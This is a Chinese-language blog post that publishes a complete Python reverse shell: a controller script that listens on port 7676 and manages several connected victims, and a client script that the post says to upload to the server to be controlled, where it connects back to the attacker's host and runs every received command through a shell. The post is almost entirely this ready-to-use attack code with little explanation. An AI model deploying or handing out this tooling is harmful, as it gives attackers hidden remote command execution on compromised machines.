一个python的反连shell

唯有爱与梦想不可辜负

服务端代码

在有公网IP的主机上开启server,默认监听7676端口,可以监听多个client的连接

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import socket
import threading

clientList = [] #连接的客户端列表
curClient = None #当前的客户端
quitThread = False #是否退出线程
lock = threading.Lock()

def shell_ctrl(socket,addr):
while True:
com = raw_input(str(addr[0]) + ':~#')
if com == '!ch':
select_client()
return
if com == '!q':
quitThread = True
print('-----------------------* Connection has ended *--------------------------')
exit(0)
socket.send(com.encode('utf-8'))
data = socket.recv(1024)
print(data.decode('utf-8'))

def select_client():
global clientList
global curClient
print('--------------* The current is connected to the client: *----------------')
for i in range(len(clientList)):
print('[%i]-> %s' % (i, str(clientList[i][1][0])))
print('Please select a client!')

while True:
num = raw_input('client num:')
if int(num) >= len(clientList):
print('Please input a correct num!')
continue
else:
break

curClient = clientList[int(num)]

print('=' * 80)
print(' ' * 20 + 'Client Shell from addr:', curClient[1][0])
print('=' * 80)

def wait_connect(sk):
global clientList
while not quitThread:
if len(clientList) == 0:
print('Waiting for the connection......')
sock, addr = sk.accept()
print('New client %s is connection!' % (addr[0]))
lock.acquire()
clientList.append((sock, addr))
lock.release()

def main():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0',7676))
s.listen(1024)

t = threading.Thread(target=wait_connect,args=(s,))
t.start()

while True:
if len(clientList) > 0:
select_client() # 选择一个客户端
shell_ctrl(curClient[0],curClient[1]) #处理shell命令

if __name__ == '__main__':
main()

客户端代码

将这个脚本上传到要控制的服务器上,执行
python client.py -H yourserverIP -p port

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import socket
import subprocess
import argparse
import sys
import time
import threading

def connectHost(ht,pt):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ht,int(pt)))
while True:
data = sock.recv(1024)
data = data.decode('utf-8')
comRst = subprocess.Popen(data,shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
m_stdout, m_stderr = comRst.communicate()
sock.send(m_stdout.decode(sys.getfilesystemencoding()).encode('utf-8'))
time.sleep(1)
sock.close()

def main():
parser = argparse.ArgumentParser() #命令行参数解析对象
parser.add_argument('-H',dest='hostName',help='Host Name')
parser.add_argument('-p',dest='conPort',help='Host Port')

args = parser.parse_args() #解析命令行参数
host = args.hostName
port = args.conPort

if host == None and port == None:
print(parser.parse_args(['-h']))
exit(0)

connectHost(host,port) #连接到控制端

if __name__ == '__main__':
main()
------ 本文结束 ------

本文标题:一个python的反连shell

文章作者:ApiCoder

发布时间:2019年07月09日 - 23:07

最后更新:2019年07月25日 - 01:07

原始链接:http://www.safeinfo.me/2019/07/09/一个python的反连shell.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

ApiCoder wechat
扫一扫,加入信安圈。
0%